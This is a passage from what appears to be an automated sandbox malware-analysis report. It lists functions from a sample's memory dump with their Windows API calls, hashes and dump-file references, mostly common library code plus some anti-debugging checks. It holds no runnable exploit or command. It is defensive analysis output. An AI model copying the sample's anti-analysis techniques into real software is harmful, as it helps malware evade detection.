                                                          • Instruction ID: c7082efab357b3de8dc73a6347f504ddd643ddb37f582c94e1eb69f059d0ebd0
                                                          • Opcode Fuzzy Hash: b6fbf6ad6b779220726939c381c11bd7b2b90c0a7071026aa5db11f7b3d3195e
                                                          • Instruction Fuzzy Hash: BC310975D0521D9BDB10DFA4DD8ABCCFBB8AF04304F1041AEE40DAB250EB759A889F45
                                                          Function 00FCE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualQuery.KERNEL32(80000000,00FCE5E8,0000001C,00FCE7DD,00000000,?,?,?,?,?,?,?,00FCE5E8,00000004,01011CEC,00FCE86D), ref: 00FCE6B4
                                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00FCE5E8,00000004,01011CEC,00FCE86D), ref: 00FCE6CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: InfoQuerySystemVirtual
                                                          • String ID: D
                                                          • API String ID: 401686933-2746444292
                                                          • Opcode ID: f272857c5c016f0c0df9e11e89de0c8b4b486200f51159203f0c0497ac95258c
                                                          • Instruction ID: 973bc176a92390001e62d6932f28ec92a6d8a22413514b3e470edd2ab22cd8c5
                                                          • Opcode Fuzzy Hash: f272857c5c016f0c0df9e11e89de0c8b4b486200f51159203f0c0497ac95258c
                                                          • Instruction Fuzzy Hash: E701A772A40109ABDB14DE29DC4DFED7BAAAFC4334F0CC128ED59DB154D638D9059690
                                                          Function 00FD8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00FD8FB5
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00FD8FBF
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00FD8FCC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: a7e9a1c48df833766caceee129d1417151a82a67558a367d8abade91016525ef
                                                          • Instruction ID: dad38afbdc6e73abbe9f6d3fd99f4510085015b6663412a74122bd15e4f7a661
                                                          • Opcode Fuzzy Hash: a7e9a1c48df833766caceee129d1417151a82a67558a367d8abade91016525ef
                                                          • Instruction Fuzzy Hash: 2731D374D0121DABCB21DF64DD89B9CBBB9AF08310F6042EAE41CA7250EB749F859F45
                                                          Function 00FDD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                          • Instruction ID: e703fe29ab0fc5d4a85227449fc9f0b0a90c568bd997a0917bb438a5577ccfba
                                                          • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                          • Instruction Fuzzy Hash: 8D022D71E002199FDF14CFA9D9806ADB7F2EF48324F29826AD919E7380D731AD41DB90
                                                          Function 00FCAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FCAF35
                                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,00FEE72C,?,?), ref: 00FCAF84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: FormatInfoLocaleNumber
                                                          • String ID:
                                                          • API String ID: 2169056816-0
                                                          • Opcode ID: 91c6f31d9e9a687a0164973ede6921b48245081e678ea5acfa227922d21afabd
                                                          • Instruction ID: 93db2edba678a5ffa9b94dc74e125c4125f48ee8c06fb46384b52c94ec74aa86
                                                          • Opcode Fuzzy Hash: 91c6f31d9e9a687a0164973ede6921b48245081e678ea5acfa227922d21afabd
                                                          • Instruction Fuzzy Hash: B401BC3A50034DABD7208F60ED4AF9B77BCEF09310F004026FA04AB190E334A914DBA5
                                                          Function 00FB6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(00FB6DDF,00000000,00000400), ref: 00FB6C74
                                                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00FB6C95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 8ea7988740d7b15b0fe05635c964d139a058ed7556fcb86568aba708a82352cd
                                                          • Instruction ID: 27fa8e44058ad0a366d9e1211614f6c0a6e5a8f86f4e28cb7598243dca70f2d2
                                                          • Opcode Fuzzy Hash: 8ea7988740d7b15b0fe05635c964d139a058ed7556fcb86568aba708a82352cd
                                                          • Instruction Fuzzy Hash: 15D05E71244300BAEA000A225C4AF6A3B5ABB40B52F14C4047340D90E4C6748410BA14
                                                          Function 00FE19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FE19EF,?,?,00000008,?,?,00FE168F,00000000), ref: 00FE1C21
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: df87500a37025fe88a22f25388fa4ede8d45ea0cc0650853c7630e1f13a55f57
                                                          • Instruction ID: ef40a40a4a0978c60d9b884e3067cd732dc63843b34d30fac1ad54199ed2a9d8
                                                          • Opcode Fuzzy Hash: df87500a37025fe88a22f25388fa4ede8d45ea0cc0650853c7630e1f13a55f57
                                                          • Instruction Fuzzy Hash: BAB16E32610648DFD715CF2EC48ABA57BE0FF45364F298658E89ACF2A1C335E991DB40
                                                          Function 00FCF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FCF66A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID:
                                                          • API String ID: 2325560087-0
                                                          • Opcode ID: 31d37c96d73ea5b2c186a1926d98e622d82a72156c20c3e3bfd14e5a936cee19
                                                          • Instruction ID: c6976df4e262f7206d3e681c724b5174fd2225f7568cdb118c321499adf67a71
                                                          • Opcode Fuzzy Hash: 31d37c96d73ea5b2c186a1926d98e622d82a72156c20c3e3bfd14e5a936cee19
                                                          • Instruction Fuzzy Hash: EE5180B1E0060A8FDB28CF64E986BAAF7F5FB48314F24853DD415EB254D3799904DB50
                                                          Function 00FBB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00FBB16B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Version
                                                          • String ID:
                                                          • API String ID: 1889659487-0
                                                          • Opcode ID: 3835586b3cacc96406bb60cefa0e22adbca9a86c184b9f3553a2429b352ff721
                                                          • Instruction ID: 4a231ced8b7542a70772a59932869868bd5ee3fa4d9b3ba0d51f18e2c4d4ed9f
                                                          • Opcode Fuzzy Hash: 3835586b3cacc96406bb60cefa0e22adbca9a86c184b9f3553a2429b352ff721
                                                          • Instruction Fuzzy Hash: D1F017B5E0024CCFDB18CB19EC96AE977B5FB88319F104295D61593390C7B0AA80EE60
                                                          Function 00FB40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gj
                                                          • API String ID: 0-4203073231
                                                          • Opcode ID: 2be7b98a6e9b71147c5813810c14a74d2ea51b0a145eb96c8070a3b792a98c71
                                                          • Instruction ID: bedc3dec7cf3eddda81f4f8249bdcc7a7312564c6cf6ce0b049e7f02fcd3830b
                                                          • Opcode Fuzzy Hash: 2be7b98a6e9b71147c5813810c14a74d2ea51b0a145eb96c8070a3b792a98c71
                                                          • Instruction Fuzzy Hash: C6C14772A183818FC354CF29D884A5AFBE1BFC8308F19892DE998D7311D734E945DB96
                                                          Function 00FCF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00FCF3A5), ref: 00FCF9DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 17e21acef5da49210a806fa49e5a70649df8695e2a472810ae31ddc09b9d10a8
                                                          • Instruction ID: 14a0e0f6baa551a9302cb22581574be77e982e0421c0bbcfd8308ad9767a0c97
                                                          • Opcode Fuzzy Hash: 17e21acef5da49210a806fa49e5a70649df8695e2a472810ae31ddc09b9d10a8
                                                          • Instruction Fuzzy Hash:
                                                          Function 00FDC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: HeapProcess
                                                          • String ID:
                                                          • API String ID: 54951025-0
                                                          • Opcode ID: e79574c259674fe379b0d8cb720a7af820f76fbe64dce5c14d10cd2c4ec9cc37
                                                          • Instruction ID: 4e3cefad7b599f2cc0245159eb6a54a257233e8155efe8e6876d0fccd67b2a6a
                                                          • Opcode Fuzzy Hash: e79574c259674fe379b0d8cb720a7af820f76fbe64dce5c14d10cd2c4ec9cc37
                                                          • Instruction Fuzzy Hash: A9A02230A02200CFC300CF30AF8C30C3BF8EB082C030A002EA008CA0B8EB3C80A0BB00
                                                          Function 00FC62CA Relevance: .8, Instructions: 829COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                          • Instruction ID: 0b9e729b4d4c7034ab9788497bfed628ccbd0cb31e9554e8896da11be2c9f2ec
                                                          • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                          • Instruction Fuzzy Hash: E5620A71A087869FCB15CF28C991BB9BBE1AF95304F08896DD8DACB342D734E945DB10
                                                          Function 00FC77EF Relevance: .8, Instructions: 817COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                          • Instruction ID: 2aa6a36c7ac791452312c4c5aabfbc701a53ad9f4ef3b74f67b67713241b6f39
                                                          • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                          • Instruction Fuzzy Hash: 316207716083468FCB15DF28C981BB9BBE1BF95304F18896DE8968B346D730E945DF11
                                                          Function 00FBF461 Relevance: .7, Instructions: 694COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                          • Instruction ID: 117a208dea3adb51d7d44ace59c88d7de908cae81b5198923d0b6bb3009f89bd
                                                          • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                          • Instruction Fuzzy Hash: C8524972A087018FC718CF19C891A6AF7E1FFCC314F498A2DE5959B255D334EA19CB86
                                                          Function 00FC7153 Relevance: .5, Instructions: 536COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e36a8563eb80fe14ceaccf4150b55c62fc982a8b9fc7b12e4b01906e9bc3e43
                                                          • Instruction ID: e53e158ad754594ad0760702b915131daf9de592bbf3750bf7681ab873c7afa0
                                                          • Opcode Fuzzy Hash: 3e36a8563eb80fe14ceaccf4150b55c62fc982a8b9fc7b12e4b01906e9bc3e43
                                                          • Instruction Fuzzy Hash: 7812CFB16087068FC718DF28C991BB9B7E1FF94304F14892EE996C7680E334A995EF45
                                                          Function 00FBC426 Relevance: .5, Instructions: 454COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d93e975c9eab08f2cccc9dfaaa3f0195231f1a656dd51c5788eea863c754fee
                                                          • Instruction ID: 43965f2eac0e64ed4926399270c38e70611c1d70a8970c9ff72a30377e4a578e
                                                          • Opcode Fuzzy Hash: 0d93e975c9eab08f2cccc9dfaaa3f0195231f1a656dd51c5788eea863c754fee
                                                          • Instruction Fuzzy Hash: 24F19D71A083018FD714CF2AC484AABBBE2EB89364F154A2EF4D9D7251D730E9459F82
                                                          Function 00FC6CDC Relevance: .3, Instructions: 343COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 71a7a5877c859f12c6baf7dfeb554417782f5ce12ea77346994aa101e7a8154c
                                                          • Instruction ID: 5a113ece9a17754e072fc28843f6ec6b38af39daa795c483aa94861a3dcb62d7
